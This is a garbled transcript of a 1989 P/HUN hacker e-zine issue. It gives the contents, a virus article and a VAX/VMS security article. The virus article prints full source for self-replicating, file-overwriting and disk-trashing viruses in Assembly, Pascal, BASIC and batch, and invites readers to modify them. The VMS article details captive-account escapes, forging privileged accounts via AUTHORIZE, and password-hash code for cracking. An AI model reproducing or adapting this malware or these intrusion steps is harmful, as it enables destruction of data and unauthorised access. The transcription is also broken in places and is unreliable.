hacker's den bbs paper work great cyberpunk.pdf
TRANSCRIPT
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 1/50
Volume 2 Articles [10] + Introduction Release : February 11th 1989 Comments: New - Vol 2
==P/HUN Magazine Inc.== @ The Hacker's Den Bulletin Board System [ Home of P/HUN Online
Magazine & 2600 Magazine BBS #5 ] (718)358/9209 :: 300/1200 Baud :: Open 24 Hrs Proudly
presents... P/HUN Issue III --------------- P/HUN Issue 3, Volume 2: Phile 1 of 11 Introduction &
Index -------------------- Welcome to P/HUN (fun) Issue III. A new volume for the New Year. We
still remember some people often ridiculed and thought that P/HUN Newsletter would stopproducing after the first or the second issue. Looks like that fraction underestimated us
severly. I would also like to say this, P/HUN was started with one highly noble thought in mind
i.e. to spread knowledge that we individually or collectively acquire through various resources.
The intent has and will never be to degrade other highly esteemed newsletters or compete
with them in anyway. The idea is to co-exist symbiotically for the good of the readers, in
mutual respect and assistance of each other. We at P/HUN Inc. are very pleased that people
enjoyed our last issue. We received many calls from all over the U.S commenting about Mr.
Slippery's "Guide to PICK Operating System" and The Mentor's "Beginners Hacking Guide". We
at P/HUN Inc. would like to thank both of them for their great contributions and hope hear
more from them in future. We are still looking for someone experienced enough to writevarious news and happenings that occur in the Phreak/Hack community. I thank all that
applied, but we really didn't find anyone properly qualified. A lot of hard work and effort has
gone into making this issue possible. Yes the size of this issue is record breaking. We hope you
find it intresting. If you have any comments, suggestion or would like to submit to our ever
growing newsletter, contact us at The Hacker's Den. If we find your article intresting we will
gladly publish it. Remember to only send us "original" & "unreleased" stuff. There will be no
exceptions. Although this issue contains an article by Capt. Zap which has already been
released. This file was a major exeception due to the fact that we found it very intresting.
P/HUN Issues can be obtained from one of the sponsor boards listed below: The Phoenix
Project - 512-441/3088 [Official Phrack & LOD/H TJ! release point] The Central Office - 914-
234/3260 [2600 Bulletin Board System #2] Here it is P/HUN Online Magazine Issue #3...Enjoy!
Red Knight & DareDevil SysOps of The Hacker's Den @ P/HUN Magazine Inc. / TSAN 89! =-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-------------------* -=|
Table of Contents |=- *-------------------* No. Phile Description Author Size --- -------------------------
--------------- ------ ---- #1 - Introduction & Table of Contents Red Knight 3K #2 - Viruses:
Assembly, Pascal, Basic & Batch Tesla Coil ][ 24K #3 - VAX/VMS System Security Lawrence
Xavier 18K #4 - AUtomated VOice Network(AUTOVON): An Outline DareDevil 26K #5 - The Pan
Am Airline Computer Part "A" Red Knight 47K #6 - The Pan Am Airline Computer Part "B" Red
Knight 26K #7 - Common Channel (I) Signalling:An overview Tubular Phreak 18K #8 - Who's
Listening * Capt. Zap 58K #9 - An Introduction to BITNET Aristotle 10K #10 - Plastic Card
Encoding Practices & Standards Hasan Ali 6K #11 - Lockpicking: An Indepth Guide The
LockSmith 14K =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile #2 of 11 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Viruses: Assembly, Pascal, Basic & Batch ---------------------------------
------- By Tesla Coil ][ [ I do not take any responsibility for any damages that may occur when ] [
compiling viruses in this article. This article has been written to ] [ promote knowledge into the
amazing world of computer viruses. ] Viruses can be written in practically every computer
language known today. Although most effective viruses have been written in Assembly. Many
of us think that viruses cannot be written in Basic due to its limited ability. This is untrue. Basic
has the capability of producing very effective viruses if properly used. Combining assembly and
basic could futher enhance the effectiveness of the virus. In this article we will examine someviruses written in Assembly, Pascal, Basic and Batch written by B. Fix, R. Burger and M. Vallen
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 2/50
which proved to be very intresting to me. Please use some caution handling these virus
programs. Please use a separate disks when you wish to compile. Virus in Assembly Language -
------------------------- Most viruses out there have been written in assembly because assembly
has the unique ability to bypass operating system security. Here is an example of a virus
written under MS-DOS 2.1 and can obviously be compiled in the later versions. The article
contains remarks so as to further explain the parts. Programmers may wish to delete thosesegments if desired. *************************************************** ; Program
Virus ; Version 1.1 ; Writter : R. Burger ; Created 1986 ; This is a demonstration program for
computer ; viruses. It has the ability to replace itself. ; and thereby modify other programs.
Enjoy. ;************************************************** Code Segment Assume
CS:Code progr equ 100h ORG progr
;************************************************** ; The three NOP's serve as the
marker byte of the ; virus which allow it to identify a virus.
;************************************************** MAIN: nop nop nop
;************************************************** ; Initialize the pointers
;************************************************** mov ax,00 mov es:[pointer],axmov es:[counter],ax mov es:[disks],al
;************************************************** ; Get the selected drive
;************************************************** mov ah,19h ;drive? int 21h
;************************************************** ; Get the current path on the
current drive ;************************************************** mov cs:drive,al
;save drive mov ah,47h ;dir? mov dh,0 add al,1 mov dl,al ;in actual drive lea si,cs:old_path ; int
21h ;************************************************** ; Get the number of drives
present. If only one ; is present, the pointer for the search order ; will be set to serach order +
6 ;************************************************** mov as,0eh ;how many disks
mov dl,0 ; int 21h mov al,01 cmp al,01 ;one drive jnz hups3 mov al,06 hups3: mov ah,0 lea
bx,search_order add bx,ax add bx,0001h mov cs:pointer,bx clc
;************************************************** ; Carry is set, if no more .COM's
are found. ; Then, to avoid unnecessary work, .EXE files will ; be renamed to .COM files and
infected. ; This causes the error message "Program to large ; to fit memory" when starting
larger infected ; EXE programs. ;*************************************************
change_disk: jnc no_name_change mov ah,17h ;change .EXE to .COM lea dx,cs:maske_exe int
21h cmp al,0ffh jnz no_name_change ;.EXE found?
;**************************************************** ; If neither .COM nor .EXE is
found then sectors ; will be overwritten depending on the system time ; in milliseconds. This is
the time of the complete ; "infection" of a storage medium. The virus can ; find nothing more
to infect and starts its destruction
;***************************************************** mov ah,2ch ; read system
clock int 21h mov bx,cs:pointer mov al,cs:[bx] mov bx,dx mov cx,2 mov dh,0 int 26h ; write
crap on disk ;****************************************************** ; Check if the
end of the search order table has been ; reached . If so, end.
;****************************************************** no_name_change: mov
bx,cs:pointer dec bx mov cs:pointer,bx mov dl,cs:[bx] cmp dl,0ffh jnz hups2 jmp hops
;**************************************************** ; Get new drive from the
search order table and ; select it .
;*************************************************** hups2: mov ah,0eh int 21h
;change disk ;*************************************************** ; Start in the rootdirectory ;*************************************************** mov ah,3bh ;change
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 3/50
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 4/50
al,1 pop dx pop cx ;restore date int 21h
;***************************************************** ; Close the file.
;***************************************************** mov ah,3eh ;close file int
21h ;***************************************************** ; Restore the old jump
address. The virus saves at ; address "conta" the jump which was at the start of ; the host
program. ; This is done to preserve the executability of the ; host program as much as possible.; After saving it still works with the jump address ; contained in the virus. The jump address in
the ; virus differs from the jump address in memory.
;**************************************************** mov dx,cs:[jmpbuf] ;restore
old jump mov cs:[conta],dx hops: nop call use_old
;**************************************************** ; Continue with the host
program. ;**************************************************** cont db 0e9h ;make
jump conta dw 0 mov ah,00 int 21h
;*************************************************** ; Reactivate the selected drive
at the start of ; the program. ;***************************************************
use_old: mov ah,0eh ;use old drive mov dl,cs:drive int 21h;*************************************************** ; Reactivate the selected path
at the start of ; the program. ;***************************************************
mov ah,3bh ;use old drive lea dx,old_path-1 ;get old path and backslash int 21h ret
search_order db 0ffh,1,0,2,3,0ffh,00,offh pointer dw 0000 ;pointer f. search order counter dw
0000 ;counter f. nth. search disks db 0 ;number of disks maske_com db "*.com",00 ;search for
com files maske_dir db "*",00 ;search for dir's maske_exe db offh,0,0,0,0,0,00111111b db
0,"????????exe",0,0,0,0 db 0,"????????com",0 maske_all db offh,0,0,0,0,0,00111111b db
0,"???????????",0,0,0,0 db 0,"????????com",0 buffer equ 0e00h ;a safe place buflen equ 230h
;lenght of virus!!!! ;carefull ;if changing!!!! jmpbuf equ buffer+buflen ;a safe place for jmp path
db "X",0 ;first place drive db 0 ;actual drive back_slash db "X" old_path db 32 dup (?) ;old path
code ends end main [ END OF THIS VIRUS PROGRAM ] Virus in Pascal --------------- Pascal is
another high level language that can produce eye popping computer viruses. Especially when
the usage of Turbo Pascal is involved. The virus below was available through various bulletin
boards for a while. $ ------------------------------------------------------------------ Number One Please
handle this virus with care!!!!!!!!!!! [Deadly Demo] Number One infects all .COM - file's name
will be displayed That file has been overwritten with Number Ones's program code and is not
reconstructible! If all files are infected or or no .COM files are found, Number one gives you a .
Files may be protected against infections of Number One by setting the Read ONLY attribute.
Written 10.3.87 by M.Vallen (Turbo Pascal 3.01A) ------------------------------------------------------
$C- $U- $I- $ Wont allow a user break, enable IO check $ -- Constants ---------------------------
------------ Const VirusSize = 12027; $Number One's code size Warning :String[42] $Warning
message = 'This file has been infected ny Number One!'; $ -- Type declarations--------------------
----------------- Type DTARec =Record $Data area for file search DOSnext :Array[1..21] of
Byte; Attr : Byte; Ftime, FDate, FLsize, FHsize : Integer; FullName: Array[1..13] of Char; End;
Registers = Record $Register set used for file search Case Byte of 1 :
(AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); End; $ --
Variables--------------------------------------------- Var $ Memory offset program code
ProgramStart : Byte absolute Cseg:$100; $ Infected marker MarkInfected : String[42]
absolute Cseg:$180; Reg : Registers; $ Register set DTA : DTARec; $ Data area Buffer :
Array[Byte] of Byte; $ Data buffer TestID : String[42]; $ To recognize infected files UsePath :
String[66]; $ Path to search files $ Lenght of search path UsePathLenght: Byte absoluteUsePath; Go : File; $ File to infect B : Byte; $ Used $ -- Program code-------------------------------
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 5/50
----------- Begin WriteLn(Warning); $ Display warning message GetDir(0, UsePath); $ get
current directory if Pos('X', UsePath) <> UsePathLenght then UsePath := UsePath + 'X';
UsePath := UsePath + '*.COM'; $ Define search mask Reg.AH := $1A; $ Set data area Reg.DS
:= Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); UsePath[Succ(UsePathLenght)]:=#0; $ Path must
end with #0 Reg.AH := $4E; Reg.DS := Seg(UsePath); Reg.DX := Ofs(UsePath[1]); Reg CX := $ff;
$ Set attribute to find ALL files MsDos(Reg); $ Find first matching entry IF notOdd(Reg.Flags) Then $ If a file found then Repeat UsePath := DTA.FullName; B := Pos(#0,
UsePath); If B > 0 then Delete(UsePath, B, 255); $ Remove garbage Assign(Go, UsePath);
Reset(Go); If IOresult = 0 Then $ If not IO error then Begin BlockRead(Go, Buffer, 2);
Move(Buffer[$80], TestID, 43); $ Test if file already ill(Infected) If TestID <> Warning Then $ If
not then ... Begin Seek (Go, 0); $ Mark file as infected and .. MarkInfected := Warning; $
Infect it BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7); Halt; $.. and halt the program
End; Close(Go); End; $ The file has already been infected, search next. Reg.AH := $4F; Reg.DS
:= Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); $ ......................Until no more files are found
Until Odd(Red.Flags); Write( '); $Give a smile End. Although this is a primitive virus its
effective.In this virus only the .COM files are infected. Its about 12K and it will change the dateentry. Viruses in Basic ---------------- Basic is great language and often people think of it as a
limited language and will not be of any use in creating something like a virus. Well you are
really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987. This program is an
overwritting virus and uses (Shell) MS-DOS to infect .EXE files.To do this you must compile the
source code using a the Microsoft Quick-BASIC.Note the lenght of the compiled and the linked
.EXE file and edit the source code to place the lenght of the object program in the LENGHTVIR
variable. BV3.EXE should be in the current directory, COMMAND.COM must be available, the
LENGHTVIR variable must be set to the lenght of the linked program and remember to use /e
parameter when compiling. 10 REM ** DEMO 20 REM ** MODIFY IT YOUR OWN WAY IF
DESIRED ** 30 REM ** BASIC DOESNT SUCK 40 REM ** NO KIDDING 50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET ** 70 REM *** TO THE LENGHT TO THE ** 80 REM ***
LINKED PROGRAM *** 90 LENGHTVIR=2641 100 VIRROOT$="BV3.EXE" 110 REM *** WRITE
THE DIRECTORY IN THE FILE "INH" 130 SHELL "DIR *.EXE>INH" 140 REM ** OPEN "INH" FILE
AND READ NAMES ** 150 OPEN "R",1,"INH",32000 160 GET #1,1 170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$ 190 LINE INPUT#1,ORIGINAL$ 200 LINE INPUT#1,ORIGINAL$ 210
ON ERROR GOT 670 220 CLOSE#2 230 F=1:LINE INPUT#1,ORIGINAL$ 240 REM ** "%" IS THE
MARKER OF THE BV3 250 REM ** "%" IN THE NAME MEANS 260 REM ** INFECTED COPY
PRESENT 270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210 280
ORIGINAL$=MID$(ORIGINAL$,1,13) 290 EXTENSIONS$=MID$(ORIGINAL,9,13) 300
MID$(EXTENSIONS$,1,1)="." 310 REM *** CONCATENATE NAMES INTO FILENAMES ** 320
F=F+1 330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN GOTO 350
340 GOTO 320 350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$ 360 ON ERROR GOTO
210 365 TEST$="" 370 REM ++ OPEN FILE FOUND +++ 380 OPEN "R",2,OROGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420 400 GET #2,2 410 LINE INPUT#1,TEST$ 420
CLOSE#2 431 REM ++ CHECK IF PROGRAM IS ILL ++ 440 REM ++ "%" AT THE END OF THE FILE
MEANS.. 450 REM ++ FILE IS ALREADY SICK ++ 460 REM IF MID$(TEST,2,1)="%" THEN GOTO
210 470 CLOSE#1 480 ORIGINALS$=ORIGINAL$ 490 MID$(ORIGINALS$,1,1)="%" 499 REM ++++
SANE "HEALTHY" PROGRAM ++++ 510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$ 520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM **** 540 C$="COPY
"+VIRROOT$+ORIGINAL$ 550 SHELL C$ 560 REM *** APPEND VIRUS MARKER *** 570 OPEN
ORIGINAL$ FOR APPEND AS #1 LEN=13 580 WRITE#1,ORIGINALS$ 590 CLOSE#1 630 REM ++OUYPUT MESSAGE ++ 640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!" 650 SYSTEM
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 6/50
660 REM ** VIRUS ERROR MESSAGE 670 PRINT "VIRUS INTERNAL ERROR GOTTCHA
!!!!":SYSTEM 680 END This basic virus will only attack .EXE files. After the execution you will
see a "INH" file which contains the directory, and the file %SORT.EXE. Programs which start
with "%" are NOT infected ,they pose as back up copies. Batch Viruses ------------- Whoever
thought that viruses could be in BATCH file.This virus which we are about to see makes use of
MS-DOS operating system. This BATCH virus uses DEBUG & EDLIN programs. Name: VR.BATecho = off ( Self explanatory) ctty nul ( This is important. Console output is turned off) path
c:Xmsdos ( May differ on other systems ) dir *.com/w>ind ( The directory is written on "ind"
ONLY name entries) edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear)
debug ind<2 ( New batch program is created with debug) edlin name.bat<3 ( This batch goes to
an executable form because of EDLIN) ctty con ( Console interface is again assigned) name (
Newly created NAME.BAT is called. In addition to file to this Batch file,there command
files,here named 1,2,3 Here is the first command file: ------------------------------- Name: 1 1,4d (
Here line 1-4 of the "IND" file are deleted ) e ( Save file ) Here is the second command file: ------
-------------------------- Name: 2 m100,10b,f000 (First program name is moved to the F000H
address to save) e108 ".BAT" (Extention of file name is changed to .BAT) m100,10b,f010 (File issaved again) e100"DEL " (DEL command is written to address 100H) mf000,f00b,104 (Original
file is written after this command) e10c 2e (Period is placed in from of extension) e110 0d,0a
(Carrige return+ line feed) mf010,f020,11f ( Modified file is moved to 11FH address from buffer
area) e112 "COPY XVR.BAT" ( COPY command is now placed in front of file) e12b od,0a (COPY
command terminated with carriage return + lf) rxc ( The CX register is ... ) 2c ( set to 2CH)
nname.bat ( Name it NAME.BAT) w ( Write ) q ( quit ) The third command file must be printed
as a hex dump because it contains 2 control characters (1Ah=Control Z) and this is not entirely
printable. Hex dump of the third command file: ----------------------------------- Name: 3 0100 31 2C
31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 1 , 1 ? . . n y y y y y y y 0110 79 29 0D 32 2C 32 3F
52-20 1A OD 6E 6E 79 79 79 y . 2 , ? ? r . . n n y y y 0120 79 79 79 79 29 0D 45 0D-00 00 00 00
00 00 00 00 y y y y . E . . . . . . . . . In order for this virus to work VR.BAT should be in the root.
This program only affects .COM files. End Note -------- All these viruses can be modified to suit
your needs. If anyone has seen any intresting viruses please contact me at The Hacker's Den
BBS. Suggested readings: Computer Viruses: A high Tech Disease by Abacus 2600 Magazine:
Volume 5, Number 2 -TC][- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-= = P/HUN Issue #3, Volume 2: Phile #3 of 11 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= VAX/VMS System Security
======================= Written for P/HUN Inc.,P/HUN Online Magazine -----------------------
--------------------- By Lawrence Xavier January, 1989 VAX/VMS may be the worlds best operating
system. It certainly beats the pants off each and every IBM OS, and wins over Unix hands
down. Native VAX/VMS security is rated higher (by the U.S. Government) than all IBM
mainframe OSs, even after such security packages as RACF and Top Secret are added to them.
VMS is not without its foibles and kludges, however. For one thing, enabling all the security
features of VMS is guaranteed to crash the system! For another, many of VMS's security
features are annoying to set up, encouraging lazy system managers to put off doing so
indefinitely. VMS got a bad reputation when young hackers were able to routinely break into
many systems by using default accounts and passwords such as username SYSTEM with
password MANAGER. This has all changed with VMS 4.7: in the upgrade procedure the installer
is required to change passwords on these accounts or eliminate them entirely. Let's go over
some of the basic features of VMS security, then look at some common problems and
loopholes. Once you know what the loopholes are you can take steps to close them on systemsyou manage and increase security. VMS Security Features ===================== Logging
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 7/50
In: ----------- VAX/VMS systems have several types of protection that can be set up on logins.
Logins can be restricted by time of day, day of the week, and by terminal ID. Logins can also be
restricted by where they come from: Local, Remote, Dialup, etc. Local are logins on direct
connect ports or DECservers. Remote are logins across DECnet. Dialup are logins across X.25 or
on ports set with the DIALUP characteristic. Usually VMS will present a Username: prompt
after it sees one or two characters (which are used by VMS to set the Baud rate, if AutoBaud isenabled). If a System Password has been set on the port, VMS will BEEP after the first , and will
then seem to be dead. Only after the correct System Password has been entered will the
Username: prompt be given. VMS gives no indication of whether a correct username has been
entered: it always asks for a Password:. VMS passwords can be like any other passwords, or
they may be generated nonsense words. The /GENERATE_PASSWORD qualifier may be placed
on user accounts by the system manager, forcing them to select from lists of supposedly easy
to remember but nonsensical passwords. The system manager may also enforce a minimum
password length and can even impose dual passwords on accounts. If a Username with dual
passwords is entered, the system will prompt for Password: twice in a row. Automatic
Password expiration dates can be set, forcing users to change their passwords every so often:from once a day to once a year or never. After the Username and Password have been
entered, the system will either log the user in, or will print the familiar message, User
Authorization Failure and will hang up after a settable number of failures (the default is 3) if
the port characteristics include DIALUP and HANGUP. Breakin Detection: ----------------- If a
hacker were trying to get into the system he could just continue to dialup and try again. But
VMS has some features to discourage this too. If breakin detection and evasion is enabled,
VMS will start to get cagey. If the count of login failures from a specific source gets high
enough, the system assumes a break-in is in progress. Only login failures caused by invalid
Passwords are counted, NOT invalid usernames. And the attempts must be coming from one of
these three sources: . A specific valid Username, and (if setup this way, A specific terminal. . A
specific remote DECnet node and remote Username. . The Username of the creator of a
detached process. By default, VMS allows five failed login attempts from any one source within
the time period specified. But it's not as simple as that! Each time a failure occurs, time is
added to the time period in which a certain number of failures can occur. To take an example
from DEC: Assume the default values are in effect. LGI_BRK_LIM specifies no more than five
login failures from one source. LGI_BRK_TMO is set for five minutes. Assume that an outsider
starts sending user names and passwords to the system. When the first password fails, the
clock starts to run and the user has four more tries in the next five minutes. When the second
attempt fails about 30 seconds later, the user has three tries left that will be counted over the
next 9.5 minutes. When the third attempt fails 30 seconds later, the login failure observation
time has reached 22.5 minutes. As a result, the next login failure from that source within 22.4
minutes will trigger evasive action. The system tolerates an average rate of login failures that is
the reciprocal of the parameter LGI_BRK_TMO... When breakin evasion is triggered, the
system will give a: User Authorization Failure message even when a valid Username and
Password are entered, giving no indication of what it is doing. Note that ONLY the Username(s)
in question are treated this way: other Usernames can still log in from the same terminal even
if terminal-specific breakin detection is enabled. The length of time VMS will hide in this way is
controlled by the sysgen parameter LGI_HID_TIM. But VMS doesn't hide for exactly this time.
Rather, it will hide for a length of time determined by the following equation: Evasion time =
LGI_HID_TIM * (random number between 1 and 1.5) The parameter LGI_BRK_DISUSER can be
set, and will tell VMS to permanently disable accounts rather than just hiding for a time. Thesystem manager then has to re-enable them manually. This is a dangerous parameter to set,
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 8/50
however, because malicious individuals could deliberately disable accounts then! If the
SYSTEM account is disabled this way, it will only be allowed to login on the VAX system
console. Security Alarms: ---------------- Although breakin attempts to different Usernames don't
activate VMS Breakin detection, they can trigger Security Alarms. Security Alarms can also be
triggered by different types of access to specific files or memory areas. Security Alarms cause
messages to be displayed on the system console, on the terminals of any user enabled asSecurity Operator, and in the Operator Log file. As DEC says, Because security auditing affects
system performance, enable security alarms only for the most important events. Damn right! If
all security alarms are enabled the system will hang! It starts writing alarms about the fact it is
writing alarms, ad infinitum.... Security alarms can be triggered on multiple login failures, on
breakin, on successful login from given ports, on failed attempts to access files, on successful
attempts to access files, etc. So even if you get privilege to override protection or to defeat it a
security alarm may still be triggered. Security alarms typically might be enabled on the
AUTHORIZE program, which adds and modifies user accounts, on SYSUAF.DAT, the
authorization database, on RIGHTSLIST.DAT, the access rights database, etc. and on critical
database files. But many sites don't bother with them because of their inconvenience.Accounting: ---------- Besides Security Alarms, Accounting can be enabled. Accounting can show
successful logins, login failures, how much resources are consumed by processes, what
programs are executed, etc. Not all sites enable accounting, and not all sites enable the same
amount of it. Accounting records show login failures but only show the username that
attempted to login if it is a valid username. File and Device Protection:
========================== UIC: ---- The primary access protection mechanism is the UIC.
This consists of a Group and a User code, numerically represented as [nnn,nnn]. It is an Octal
number. Since VMS 4.x versions the UIC can also be expressed as [name] or [name,name], but
internally this is translated back to the old format. Users, processes, files, devices, memory
sections, etc. all have UICs. Files, devices, memory sections, etc. can have access by System,
Owner, Group and World, any combination of Read, Write, Execute, Delete for each category.
System are the system accounts. Owner is the account(s) who's UIC is the same as that on the
object (file, device, etc.). Group are accounts with the same first UIC number. World is
everyone. So a process with UIC [23,7] could access an object with UIC [23,4] if that object
allowed access by Group or World. The process could access an object with UIC [25,3] only if
World access was allowed, and could access objects with UIC [23,7] if Owner, Group, or World
was allowed. ACL: ---- Also, there's a protection mechanism called the ACL or Access Control
List. This is in addition to, and can override UIC protection. With ACLs an Identifier is created,
like MODEM for one or more modem ports. An ACL is created on the port(s) desired, and in
the ACL are multiple Access Control Entries (ACEs). If one of them is: (Identifier=MODEM,
Access=Read+Write) for example, user who has been Granted the identifier MODEM can
access those ports. These access privileges, like UICs apply to processes in general. Granting
and managing Identifiers is done in the AUTHORIZE program. Loopholes, Ways of Defeating
Security... ======================================== Although VMS has great security
it's often applied poorly. For one thing, protection is often not set up properly, programs are
installed with too much privilege etc. (Programs can be installed so they have privilege when
run even if the user running them has no privilege). Getting a $ prompt: ------------------- If a
hacker logs into a VMS system and finds himself trapped within application programs the first
thing he will want to do is to get out to the normal DCL command mode from where more
things can be done. Hackers will try several things and you should check to make sure they
can't try these tricks on your system. AllInOne: In AllInOne, DEC's popular Electronic Mail andmenuing Office Automation system, typing $ (the dollar sign) will by default take the user to
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 9/50
DCL level. Typing ADMIN will get the user into the AllInOne administrator menu. From there
they can create accounts with $ access. AllInOne mail also has a feature where macros can be
attached to mail and executed when the mail is read. If the hacker sends a message of this
type to some user with privilege, the macro can go off in the background and create accounts,
etc. for the hacker. This feature should be disabled. Other Captive Account tricks: Holding
down and letting it repeat for a while will often cause accounts that are trapped in a commandprocedure but not marked as CAPTIVE in the UAF to exit from the command procedure to DCL.
If an account has access to VAXMAIL (the MAIL command) it can often use MAIL's SPAWN
command to spawn a process with DCL access. The TPU editor has a similar SPAWN command.
If an account is not marked CAPTIVE the user can try to add /NOCOMMAND after the
username, like the following: Username: fred/nocommand This will cause the command
procedure to not be executed, leaving the hacker at a DCL $ prompt. There are many more
too. For this reason you should mark all accounts that are supposed to be captive as CAPTIVE
using the AUTHORIZE utility. When at the $ Prompt: --------------------- Since protection is often
set incorrectly, hackers can take advantage and use this to bypass security. A couple of
examples will serve to show that you must be diligent in setting the protections properly onsystems you manage. If SYS$SYSTEM:AUTHORIZE.EXE is not protected, it can be run by non-
privileged users. The hacker would then run AUTHORIZE and create a new SYSUAF.DAT file in
his own directory (AUTHORIZE will do this by default if not run in the SYS$SYSTEM directory).
The hacker would add a privileged username to the new SYSUAF.DAT, copy it back to
SYS$SYSTEM:, log out, log in again as the new privileged user, and quickly delete the new
SYSUAF.DAT so that other users don't get "Authorization Failure" messages. The hacker would
then be able to add privileged accounts to SYSUAF.DAT at his leisure. Another clever idea
would be for the hacker who has gained access to copy SYSUAF.DAT to another directory and
then try to find out what passwords are in it. VMS uses a one-way encryption algorithm, but a
gifted hacker will use the same algorithm to repeatedly encrypt different passwords until he
finds ones that match. A copy of the VMS assembly language code to do this encryption can be
found in the appendix, for your information. Again, setting the protection properly will keep
this from happening to your system! Conclusion: =========== This has been a brief overview
of VMS security. For more information, read your DEC manuals. A good place to start is the
handy VMS System Manager's Manual, Order Number AA-LA00A-TE, which can be obtained
from DEC Direct and should have come with your VMS update. The importance of proper
security cannot be over emphasized, but if you overdo it performance will suffer. Experiment
on your system to find a good balance. Don't ignore security or you may regret it rather
intensely. Appendix -- VMS assembly code for encrypting passwords:
======================================================= .TITLE HPWD - hash user
password .IDENT 'V02-002' ; Hash PassWorD: ; Hash a password irreversibly. This is one way
encryption with ; no decryption possible. ; This code was obtained by disassembling the
AUTHORIZE program. ; See the VMS microfiche for the fully commented code: ; e
_lib$code:_lib$code+68 ; Input Parameters: ; PWDDSC - Address of password descriptor ;
ENCRYPT - Encryption algorithm index (byte) ; SALT - Random number (word) ; USRDSC -
Address of username descriptor ; Output Parameters: ; OUTDSC - Address of encrypted output
descriptor OUTDSC=4 PWDDSC=OUTDSC+4 ENCRYPT=PWDDSC+4 SALT=ENCRYPT+4
USRDSC=SALT+4 .PSECT _LIB$CODE RD,NOWRT,PIC,SHR,BYTE,EXE ; AUTODIN-II polynomial
table used by CRC algorithm AUTODIN: .LONG
^X000000000,^X01DB71064,^X03B6E20C8,^X026D930AC,^X076DC4190 .LONG
^X06B6B51F4,^X04DB26158,^X05005713C,^X0EDB88320,^X0F00F9344 .LONG^X0D6D6A3E8,^X0CB61B38C,^X09B64C2B0,^X086D3D2D4,^X0A00AE278 .LONG
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 10/50
^X0BDBDF21C ; Purdy polynomial coefficients. Prime, but don't need to be Purdy_Poly: c:
.LONG -83,-1 .LONG -179,-1 .LONG -257,-1 .LONG -323,-1 .LONG -363,-1 .ENTRY LGI$HPWD,^M
MOVAQ @outdsc(AP),R4 MOVAQ @4(R4),R4 TSTB encrypt(AP) BGTRU 10$ MNEGL #1,R0
MOVAQ @pwddsc(AP),R1 CRC autodin,R0,(R1),@4(R1) CLRL R1 MOVQ R0,(R4) BRB 20$ 10$:
CLRQ (R4) MOVAQ @pwddsc(AP),R3 BSBB COLLAPSE_R2 ADDW2 salt(AP),3(R4) MOVAQ
@usrdsc(AP),R3 BSBB COLLAPSE_R2 PUSHAQ (R4) CALLS #1,PURDY 20$: MOVL #1,R0 RETCOLLAPSE_R2: MOVZWL (R3),R0 BEQL 20$ MOVAL @4(R3),R2 PUSHR #^M MOVL R0,R1 5$:
CMPB (R2)+,#32 BNEQ 7$ DECL R1 7$: SOBGTR R0,5$ MOVL R1,R0 POPR #^M 10$: BICL3 #-
8,R0,R1 ADDB2 (R2)+,(R4)[R1] SOBGTR R0,10$ 20$: RSB a=59 n0=1@24-3 n1=1@24-63 .ENTRY
PURDY,^M MOVQ @4(AP),-(SP) BSBW PQMOD_R0 MOVAQ (SP),R4 MOVAQ PURDY_POLY,R5
